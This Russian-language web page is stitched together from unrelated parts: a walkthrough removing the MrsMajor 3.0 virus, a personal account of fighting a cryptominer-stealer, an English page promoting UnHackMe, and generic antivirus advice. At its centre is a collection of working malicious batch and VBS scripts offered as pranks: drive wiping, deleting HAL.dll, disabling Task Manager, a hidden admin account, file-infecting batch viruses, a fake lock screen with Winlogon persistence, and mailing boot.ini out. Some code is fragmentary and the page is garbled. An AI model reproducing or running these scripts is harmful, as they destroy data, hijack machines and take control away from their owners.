Перезагружаемся, заходим снова в powershell.exe и ищем что-нибудь ещё.
Процесс dwm.exe отвечает за графическую часть вируса (кровь на экране, пиксели и уровень крови), если этот процесс убить, то получается заморозить уровень, и обновить графическую часть.

Ищем в стандартном поиске по файлам, приложение tobi0a0c.exe в папке Windows.
Находится он по пути: C:\Windows\winbase_base_procid_none\secureloc0x65
Размер: 5,06 МБ
Ну а как только мы переходим в папку winbase_base_procid_none, то система подвисает и в итоге снова срабатывает Blue screen — синий экран.

В этой папке находятся 4 приложения, 2 звуковых Wav файла, vbs-файл скрипт запуска, указатель и иконка глаза. Это как раз всё то, что связано с этим вирусом. Возможно, как раз файл bsector3.exe затирает загрузочный сектор.

Список файлов MrsMajor 3.0, в папке secureloc0x65 :

  • tobi0a0c.exe (5 191 КБ)
  • ui65.exe (116 КБ)
  • ui66.exe (2 969 КБ)
  • bsector3.exe (72 КБ)
  • mainbgtheme.wav (2 466 КБ)
  • 0x000F.wav (2 466 КБ)
  • WinRapistI386.vbs (1 КБ)
  • rcur.cur (5 КБ)
  • winsxs.ico (492 КБ)

Попробуем удалить файлы из этой папки. Удалить получается всё кроме файла tobi0a0c.exe, который на данный момент запущен. Но в любом случае мы удалили часть важных файлов, среди которых был запускаемый скрипт-файл.

Перезагружаем теперь нашу виртуальную машину, и смотрим что из этого вышло.

Как итог, после удаления данных файлов вируса, заметно сразу, что потрепались иконки наших ярлыков, звуковые файлы мы удалили, также графическая часть восстановлена.

Проверим работает ли диспетчер задач.
Открываем PowerShell, и вводим команду taskmgr, и нам выводит окно, о том, что диспетчер задач отключен администратором.

Чтобы решить эти проблемы, вводим некую команду gpedit.msc (Редактор групповой локальной политики).

Как итог комбинация клавиш Ctrl+Shift+Esc теперь будет работать и запускать диспетчер задач. Редактор реестра также будет работать.

Теперь удалим из автозагрузки оставшееся событие от скрипта который мы удалили, что бы оно не выскакивало, при следующей загрузке системы. При этом, мы не найдём это событие в Автозагрузке, через msconfig, его там нет! Его нет не в списке автозагрузки, не в планировщике задач, при этом событие каждый раз срабатывает при включении ПК! Это странно.

Поэтому ищем WinRapistI386.vbs по поиску в редакторе реестра.
Как оказалось это событие скрипта vbs прописалось к запуску рабочего стола (Shell).
Поэтому, редактируем значение этого параметра Shell, оставив только explorer.exe


Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер
@echo off
shutdown -s -t 1 -c «lol» >nul

Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c «lol» >nul

Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

Удаление дров
@echo off
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul

Удаляет звуки Windows
@echo off
del «%SystemRoot%\Media» /q >nul

Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul

Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q

Удаляет все файлы в program files
del c:Program Files/q

Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul

Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul

Удаляет команду DEL
del %0

Будет открывать бесконечно Paint
:x
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt

Заражает Autoexec
copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul
reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y

сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton

Удаляет ядро системы
del %systemroot%\system32\HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb» c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb» c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Жестокие вирусы:
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile(«%systemdrive%\windows\system32\rundll32.dat», True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile «%systemdrive%\windows\system32\rundll32.dat» >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f

«) = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment «c:\boot.ini» >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs

echo s.run «shutdown -r -t 0 -c «»pcforumhack.ru™»» -f»,1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус.
title Внимание.
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO «Shell»=»Explorer.exe, C:\\windows\\boot.bat » >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add «HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if «%choise%» == «101» goto gold
if «%choise%» == «200393» goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end

Добавляет программу в автозагрузку ОС
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD

@echo off
chcp 1251
echo щаска.
color 4
@echo Вас собирается

What is MOVEMENOREG.VBS?

MOVEMENOREG.VBS is a pretty popular virus.

MOVEMENOREG.VBS detected as TROJ.MOVEMENOREG.

You can get it on your computer while downloading it bundled with some free software.
Sadly, most free downloads do not disclose that other programs will be installed, so you are more likely to get MOVEMENOREG.VBS on your PC without your own knowledge.

After being downloaded, MOVEMENOREG.VBS hijacks your browser and changes search settings.
MOVEMENOREG.VBS also causes an appearance of popup ads and browser redirecting.

MOVEMENOREG.VBS is very annoying and hard to get rid of.

Technical Information:

  • Full path on a computer= %TEMP%\WINDOWSSERVICES\MOVEMENOREG.VBS

You have 2 ways to remove MOVEMENOREG.VBS:

Why I recommend you to use an automatic way?

  1. You know only one virus name: «MOVEMENOREG.VBS», but usually you have infected by a bunch of viruses.
    The UnHackMe program detects this threat and all others.
  2. UnHackMe is quite fast! You need only 5 minutes to check your PC.
  3. UnHackMe uses the special features to remove hard in removal viruses. If you remove a virus manually, it can prevent deleting using a self-protecting module. If you even delete the virus, it may recreate himself by a stealthy module.
  4. UnHackMe is small and compatible with any antivirus.
  5. UnHackMe is fully free for 30-days!

Here’s how to remove MOVEMENOREG.VBS virus automatically:

STEP 1: Install UnHackMe (1 minute)

STEP 2: Scan for malware using UnHackMe (1 minute)

STEP 3: Remove MOVEMENOREG.VBS virus (3 minutes)

So it was much easier to fix such problem automatically, wasn’t it?
That is why I strongly advise you to use UnHackMe for remove MOVEMENOREG.VBS redirect or other unwanted software.

How to remove MOVEMENOREG.VBS manually:

STEP 1: Check all shortcuts of your browsers on your desktop, taskbar and in the Start menu. Right click on your shortcut and change it’s properties.

You can see MOVEMENOREG.VBS or another web site at the end of shortcut target (command line). Remove it and save changes.

In addition, check this command line for fake browser’s trick.
For example, if a shortcut points to Google Chrome, it must have the path:
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
Fake browser may be: …\Appdata\Roaming\HPReyos\ReyosStarter3.exe.
Also the file name may be: “chromium.exe” instead of chrome.exe.

STEP 2: Investigate the list of installed programs and uninstall all unknown recently installed programs.

check installed programs to uninstall

STEP 3: Open Task Manager and close all processes, related to MOVEMENOREG.VBS in their description. Discover the directories where such processes start. Search for random or strange file names.

Remove MOVEMENOREG.VBS virus from running processes

Remove MOVEMENOREG.VBS virus from running processes

STEP 4: Inspect the Windows services. Press Win+R, type in: services.msc and press OK.

Remove MOVEMENOREG.VBS virus from Windows services

Remove MOVEMENOREG.VBS virus from Windows services

Disable the services with random names or contains MOVEMENOREG.VBS in it’s name or description.

STEP 5: After that press Win+R, type in: taskschd.msc and press OK to open Windows Task Scheduler.

Remove MOVEMENOREG.VBS from scheduled task list.

Delete any task related to MOVEMENOREG.VBS. Disable unknown tasks with random names.

STEP 6: Clear the Windows registry from MOVEMENOREG.VBS virus.
Press Win+R, type in: regedit.exe and press OK.

Remove MOVEMENOREG.VBS virus from Windows registry

Remove MOVEMENOREG.VBS virus from Windows registry

Find and delete all keys/values contains MOVEMENOREG.VBS.

STEP 7: Remove MOVEMENOREG.VBS from Google Chrome.

Remove MOVEMENOREG.VBS Virus from Chrome Extensions

STEP 8: Remove MOVEMENOREG.VBS from Internet Explorer.

Set Internet Explorer Homepage

Set Internet Explorer Homepage

STEP 9: Remove MOVEMENOREG.VBS from Mozilla Firefox.

Change Firefox Home Page

Change Firefox Home Page

STEP 10: And at the end, clear your basket, temporal files, browser’s cache.

But if you miss any of these steps and only one part of virus remains – it will come back again immediately or after reboot.

Такого умного вируса, честно говоря, на своей памяти, я ни разу не видел. Он умен, хитер, и скрытен. Самым тяжелым была борьба с этим кибер-паразитом.

В последнее время, я стал замечать, что ноутбук стал работать медленнее, больше нагревается, и вообще какая-то фигня с микрофоном (в настройках конфиденциальности не давал ползунок включения сдвинуть) . Решил загуглить: тишина, лишь куча бесполезной информации.

Подумал: зайду-ка я в диспетчер задач, проверить, может, есть что-то не то. Когда я попал в диспетчер задач, то обнаружил стандартные процессы, и лишь один из сотни заострил на себе мой взгляд: «System» со странной иконкой. Тогда-то, в моей голове и встало всё на свои места.

Когда я собрался с силами, я решился начать «войну» с этим вирусом. Почему войну? Потому что удаление этого вируса было равнозначно войне. Далее поймете почему я выразился именно так.

Для начала, я попытался действовать стандартными способами:

Найти каталог где лежит вирус
Удалить как каталог, так и вирус

Какого было мое удивление, когда меня послали куда подальше)) Сначала, диспетчер задач закрылся через 2 секунды, после того как я нажал «Свойства» (чтобы просмотреть путь до файла), но я успел просмотреть путь.

Тогда я и подумать не мог, что моему удивлению еще будет куда идти: папка-то оказалась пуста, от слова совсем. В тот момент, в моей голове родился спорный вопрос: «То-ли я дурак, то-ли лыжи не едут», т.к. такого быть не может: диспетчер задач видит, что файл запущен из этого каталога, а его там вовсе нет.

С горем пополам, до меня дошла мысль: а если я всё-таки посмотрел каталог неверно. Открыл диспетчер задач, скачал скриншотер (не реклама) , и быстренько сделал скриншот этого самого файла, чтобы ориентироваться где искать этого скромника))

Итак. Нашел. Дальше, я подумал, что дело совсем простое: удалить, и забыть. Но фиг бы там плавал — в директорию ведь не зайти. Решил действовать через cmd (командную строку). Перешел в «C:\ProgramData\», и через «rd» решил удалить всю директорию вируса. Но, меня послали куда подальше, сообщив, что такого файла в помине нет, но в тоже время есть.

Дальше, я прикинул что к чему, и решил действовать основательно. Вспомнил о существовании команды «DEL» с различными флагами. Вот тут, я и столкнулся с главной проблемой: регенерация. Удаляя один файл, второй воссоздавал копию удаленного файла. Проще говоря: делал всю мою работу бессмысленной.

Поняв, что я имею дело с противником гораздо умнее других противных, но тупых вирусов, до меня дошло: действовать надо основательно. Но как?

В ходе своих попыток, мне удалось выяснить следующее: он триггерится на (не реклама) «Process Hacker» (И независимо от того, открыл ли я в браузере это название, или скачал программу) и на похожие ей программы, тупо закрывая их, в т.ч. и браузер, если там открыта хоть 1 вкладка с названием программы из его внутренней базы. Также, удалось выяснить, что после пары попыток закрытия дочерних .exe файлов (их полный список выложу чуть ниже) он вообще перестает допускать до диспетчера задач, просто закрывая его (однако, такой теневой бан длится максимум 5 минут).

По итогу, чтобы победить его, я нашел программу «AnVir» (не реклама) на которую он пускай и агрился, но по крайней мере можно было изменить её название и всё (к слову, с Process Hacker так сделать нельзя было, ибо тогда он не мог подгрузить внутренние модули самого PH). Благодаря этой программе, я увидел, что он заселил все свои файлы в автозагрузку для всех пользователей.

В этой самой программе, мне удалось закинуть вирусные файлы в карантин на время, чтобы они не мешали мне заниматься удалением. Далее, я нашел один интересный файл: «script.bat«. И вот, передо мной все карты: вся его механика работы.

Что здесь можно увидеть? Во-первых: он палит все свои вирусные файлы, их расположение, и методы работы (на счёт этого: почти все), во-вторых: он сливал все данные о пользователе на iplogger (далее поясню для чего).
С горем пополам, удалив все его файлы через «XYplorer» (не реклама), я нашел в его папках несколько файлов, которые привлекли мой интерес: «new.xml» и «settings.dat«.

Как я уже упоминал выше, меня заинтересовали файлы «new.xml» и «settings.dat«.
При изучении файла «new.xml«, честно говоря, я выпал. Вирус подделывал подписи под подписи известных (и не очень) анти-вирусов, чтобы система и Windows Defender не ругались на высокие приоритеты приложений, и их действия. Там был расположен ОГРОМНЫЙ лист анти-вирусов, и прочих производителей (наверное, на всякий случай).

Файл «settings.dat» не открыл мне ничего особо нового, кроме того, что половина защиты вируса, изначально, находилась в нём, т.к. именно он ставил ограничения и вылеты, а .bat скрипт вируса лишь обеспечивал перезапуск вирусных .exe файлов и защиту от их завершения.

То есть, если подводить такие итоги, то .bat скрипт + settings.dat (настройки основного вирусного файла «winserv.exe«) — создавали эффект регенерации вируса, пока тот сливал все данные (в т.ч. и пароли, скриншоты работы пользователя, и многое другое), майнил на пк, и разносил себя на другие носители (как я предполагаю).

В результате своих действий, мне удалось выловить длинный лист файлов, которые я опубликую ниже, чтобы если Вы столкнулись с данным вирусом, то без проблем могли его удалить самостоятельно.

Написал я данную статью в связи с тем, что пока я бился с этим противным (но отнюдь умным) вирусом, в интернете я не нашел вообще информации по его удалению (естественно, не считая рекомендации переустановки системы).

Да и переустанавливать систему не имело никакого смысла. Во-первых: даже если у Вас два диска, то вирус просто размножит себя на два диска, и так или иначе Вы с ним останетесь. Во-вторых: если у Вас нет второго диска, и Вы переустановите систему, то вы потеряете всю свою личную информацию. В-третьих: даже если Вы сольете информацию на флешку, то не факт, что вирус не заразит флешку.

UPD: Один из комментаторов указал на то, что я не добавил в статью одну важную информацию, за что ему и спасибо! Итак. Теперь к сути.

Вирус изначально был зашит в мою систему (образ которой, я качал с торрента), а также, вирус сейчас массово зашивают в установщики игр (особенно любят портить репаки Xatab*(не реклама) ). Один из примеров сайтов, где зашивают вирусы в некоторые иры: moreigr (точнее одно из зеркал, не реклама).

К сожалению, сам сайт где я скачивал образ — я потерял, однако, советую не качать сборки Windows 10 Pro 22H2, образ которой может развернуться на флешке 4GB. Один из таких образов я и подхватил. На счёт зеркала moreigr (не реклама) где был вирус тоже не скажу, ибо история давняя (было еще весной 2023), но там я решил не заморачиваться и сделал переустановку. На этом всё =)
* Xatab. Помним, любим, скорбим. Press F.

Поэтому, я надеюсь, мой пост поможет многим решить данную проблему, и очиститься от вирусов. Оставьте свое мнение в комментариях, и поделитесь: сталкивались-ли Вы с этим вирусом, и как бы Вы боролись с ним?

Содержание

  1. Windows services вирус — эффективные методы удаления
  2. Как удалить вирус Windows services
  3. Вирус Windows services: что это и как он попадает на компьютер
  4. Признаки наличия вируса Windows services на компьютере
  5. Как удалить вирус Windows services вручную
  6. Эффективные антивирусные программы для удаления вируса Windows services
  7. Восстановление системы после удаления вируса Windows services
  8. Защита компьютера от будущих атак вируса Windows services
  9. 1. Обновляйте операционную систему
  10. 2. Установите антивирусное программное обеспечение
  11. 3. Осторожность в интернете
  12. 4. Установите брандмауэр

Windows services вирус — эффективные методы удаления

Вирусы на компьютере могут вызвать немало проблем и нарушений в его работе. Особенно опасными бывают вирусы, связанные с Windows services. Если вы столкнулись с подозрительным поведением вашей операционной системы или обнаружили, что вирус находится в службах Windows, необходимо срочно принять меры по его удалению и защите вашего компьютера.

Windows services играют важную роль в работе операционной системы Windows. Они обеспечивают функционал и возможности, такие как обновление программ, работа с сетью, управление памятью и многое другое. Однако, некоторые вирусы могут маскироваться под службы Windows и использовать их для своих злонамеренных целей.

Как же определить, что ваш компьютер заражен вирусом, связанным с Windows services? Существует несколько признаков, на которые стоит обратить внимание. Например, появление подозрительных процессов в диспетчере задач, самопроизвольное открытие непонятных окон или высокая загрузка процессора без видимых причин. Если вы столкнулись с подобной ситуацией, возможно ваш компьютер заражен вирусом, и вам необходимо принять соответствующие меры.

Что же делать, если ваш компьютер заражен вирусом, связанным с Windows services? Первым шагом должно быть удаление вируса. Существует несколько методов для этого. Один из самых эффективных способов — использование антивирусных программ. Они способны обнаружить и удалить вредоносное ПО, в том числе и вирусы, связанные с Windows services. Кроме того, рекомендуется регулярно обновлять антивирусное ПО, чтобы быть защищенными от новых угроз.

Однако, после удаления вируса, важно принять меры, чтобы предотвратить повторное заражение. В первую очередь, установите надежное антивирусное программное обеспечение и регулярно обновляйте его. Также рекомендуется обратить внимание на безопасность интернет-соединения и быть осторожными при скачивании и установке программ.

Как удалить вирус Windows services

Существует несколько способов удаления вируса Windows services. Первым шагом должно быть использование антивирусного программного обеспечения для сканирования и обнаружения вредоносных программ на компьютере. Хорошо известные антивирусные программы, такие как Avast, AVG, Kaspersky и Norton, могут помочь вам определить и удалить вирус Windows services.

Вторым способом является ручное удаление вируса Windows services. Для этого необходимо в первую очередь определить местоположение вируса на компьютере. Вы можете использовать диспетчер задач или специальное антивирусное программное обеспечение для этой цели. Затем следует перейти к удалению вируса, следуя инструкциям и рекомендациям относительно каждого конкретного вируса Windows services.

Вирус Windows services: что это и как он попадает на компьютер

Главная цель вируса Windows services – это получение контроля над компьютером и сворачивание важных функций, мешая работе операционной системы. По большей части, такие вирусы работают в фоновом режиме и могут собирать конфиденциальную информацию, отправлять спам или запускать другие вредоносные программы.

Чтобы предотвратить заражение компьютера вирусом Windows services, необходимо принять несколько мер предосторожности. Во-первых, важно устанавливать антивирусное программное обеспечение и регулярно обновлять его для защиты от новых угроз. Во-вторых, следует быть осторожным при посещении веб-сайтов и открывании электронных писем, особенно если они содержат подозрительные ссылки или вложения.

Также рекомендуется использовать оригинальное программное обеспечение и скачивать обновления только с официальных и надежных источников. Если вы заметили необычную активность на вашем компьютере, такую как медленная работа или появление странных сообщений, важно просканировать систему антивирусной программой и удалить обнаруженные угрозы.

В целом, осознание возможных угроз и правильное соблюдение мер предосторожности помогут вам защитить ваш компьютер от вируса Windows services и других вредоносных программ. Будьте внимательны и осторожны, чтобы сохранить вашу систему в безопасности.

Признаки наличия вируса Windows services на компьютере

В последнее время в сети все чаще можно встретить информацию о вирусе Windows services, который может серьезно навредить вашему компьютеру. Вредоносное ПО, такое как вирус Windows services, может проникнуть на ваш компьютер через небезопасные ссылки, фальшивые загрузки программ или почтовые вложения. Поэтому важно знать, какие признаки указывают на его наличие, чтобы принять меры вовремя и защитить свои данные.

Один из первых признаков возможного наличия вируса Windows services — это замедленная работа компьютера. Если ваш компьютер начал работать медленнее обычного, появились задержки при открытии программ или доступе к файлам, это может быть признаком активности вредоносного ПО. Также обратите внимание на появление странных окон или всплывающих рекламных сообщений, которые могут указывать на наличие вируса.

Еще одним признаком возможного заражения вирусом Windows services являются проблемы с интернет-соединением. Если вдруг у вас начались проблемы с доступом к сети, медленная загрузка веб-страниц или постоянные сбои в работе браузера, это может быть следствием действия вредоносного ПО. Также обратите внимание на изменение стартовой страницы в вашем браузере без вашего ведома.

Если вы заметили упомянутые признаки на своем компьютере, то важно принять меры для удаления вируса Windows services и защиты ваших данных. Вы можете воспользоваться антивирусными программами, чтобы сканировать ваш компьютер и удалить обнаруженные угрозы. Также никогда не открывайте подозрительные ссылки или загрузки, и будьте осторожны с почтовыми вложениями от незнакомых отправителей. Соблюдая эти меры предосторожности, вы сможете защитить свой компьютер от вирусов и сохранить свои данные в безопасности.

Как удалить вирус Windows services вручную

Удаление вируса Windows Services может быть сложной задачей, требующей некоторых знаний и опыта в области компьютерной безопасности. Однако, если вы подозреваете наличие этого вируса на вашем компьютере, есть несколько шагов, которые вы можете предпринять для его удаления.

Во-первых, рекомендуется запустить антивирусное программное обеспечение для поиска и удаления вредоносных программ. Обновите свою антивирусную программу до последней версии и выполните полное сканирование вашей системы. Если ваш антивирус обнаружит вирус Windows Services, следуйте указаниям программы по его удалению.

Если антивирус не обнаруживает вирус или не может его удалить, вы можете попробовать вручную удалить его. Однако будьте осторожны, так как удаление неправильных файлов или реестровых записей может привести к серьезным проблемам с вашей системой. Если вы не уверены в том, какие файлы и записи следует удалить, лучше обратиться за помощью к специалисту в области компьютерной безопасности.

Эффективные антивирусные программы для удаления вируса Windows services

Если вам постоянно мешает вирус Windows services на вашем компьютере, то важно найти эффективный способ его удаления. Данный вирус может причинить серьезные проблемы, вызывая сбои в системе, замедление работы компьютера и утечку личных данных. Однако, существуют различные антивирусные программы, специально разработанные для обнаружения и удаления вредоносных программ, включая и вирус Windows services.

Одна из таких программ является Avast Free Antivirus. Она обладает мощным движком, который может обнаружить и удалить вирус Windows services, а также другие вредоносные программы. Avast Free Antivirus предлагает режим сканирования в реальном времени, что означает, что вы получите защиту даже во время выполнения задач на компьютере. Более того, программа обновляется регулярно, чтобы держать вас в безопасности от новейших угроз.

Еще одной популярной антивирусной программой является Kaspersky Anti-Virus. Эта программа также обеспечивает защиту от различных видов вредоносных программ, включая вирус Windows services. Кaspersky Anti-Virus предлагает простой и понятный интерфейс, а также мощные инструменты для обнаружения и удаления вирусов. Она также оснащена функцией автоматического обновления, чтобы гарантировать вашу безопасность.

Если вам нужно удалить вирус Windows services, то эти антивирусные программы предлагают надежное и эффективное решение. Онлайн-безопасность должна быть вашим приоритетом, поэтому регулярные сканирования вашего компьютера с использованием этих программ помогут вам защитить свои личные данные и поддерживать вашу систему в безопасности.

Восстановление системы после удаления вируса Windows services

Первым шагом при восстановлении системы является проверка целостности системных файлов. Вирусы могут повредить или изменить системные файлы, что может привести к неправильной работе системы. Для этого необходимо воспользоваться инструментом проверки системных файлов, таким как «sfc /scannow» в командной строке. Этот инструмент автоматически проверит и восстановит поврежденные файлы, восстанавливая нормальную работу системы.

Затем следует провести полное сканирование системы с помощью антивирусного программного обеспечения. Удаление вируса Windows Services не гарантирует удаление других вредоносных программ, которые могут быть присутствовать в системе. Антивирусное програмное обеспечение может обнаружить и удалить эти программы, восстанавливая безопасность системы. Важно установить обновленную версию антивирусного программного обеспечения и регулярно обновлять его базы данных, чтобы обеспечить максимальную эффективность защиты.

Кроме того, рекомендуется проверить систему на наличие нежелательных изменений в настройках или реестре. Вирусы могут изменить определенные настройки системы или реестра, что может привести к проблемам с работой системы. Пользователям рекомендуется восстановить настройки на предыдущие значения или использовать системные инструменты восстановления, такие как «System Restore», чтобы вернуть систему к стабильному состоянию до инфицирования вирусом.

Иногда может потребоваться также восстановить поврежденные или удаленные файлы системы. Если вирус удалил важные системные файлы, пользователь может столкнуться с проблемами при работе системы. В этом случае можно воспользоваться инструментом восстановления системы или переустановить операционную систему, чтобы восстановить утраченные файлы и восстановить нормальную работу системы.

Восстановление системы после удаления вируса Windows Services может быть сложной и затратной процедурой. Пользователи должны принимать меры предосторожности, чтобы избежать заражения вирусами, такими как установка надежного антивирусного программного обеспечения, обновление системы и осторожное поведение в Интернете. Следование рекомендациям и советам по обеспечению безопасности поможет предотвратить будущие инциденты с вирусами и обеспечить стабильную работу системы.

Защита компьютера от будущих атак вируса Windows services

Для обеспечения безопасности компьютера и предотвращения будущих атак вируса Windows services, следует принять несколько мер предосторожности.

1. Обновляйте операционную систему

Постоянно проверяйте наличие обновлений для вашей операционной системы и устанавливайте их своевременно. Это поможет закрыть уязвимости, которые могут быть использованы злонамеренным программным обеспечением.

2. Установите антивирусное программное обеспечение

Выберите надежное антивирусное программное обеспечение и регулярно обновляйте его базы данных. Это поможет обнаружить и блокировать вредоносные программы, в том числе и вирусы Windows services.

3. Осторожность в интернете

Будьте внимательны при посещении веб-сайтов и скачивании файлов из ненадежных источников. Избегайте открытия подозрительных вложений в электронной почте. Это поможет уменьшить риск заражения компьютера вирусом Windows services.

4. Установите брандмауэр

Включите брандмауэр на вашем компьютере, чтобы контролировать и блокировать входящие и исходящие соединения. Это поможет предотвратить несанкционированный доступ и выявить атаки со стороны вируса Windows services.

Применяя эти простые меры предосторожности, вы сможете значительно повысить уровень безопасности вашего компьютера и защитить его от будущих атак вируса Windows services.

Понравилась статья? Поделить с друзьями:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
  • Квартира под управлением windows
  • Windows 10 lot torrent
  • Как установить windows xp на virtualbox инструкция
  • Экран смещен влево как исправить windows 10
  • Как уменьшить чувствительность колесика мыши на windows 10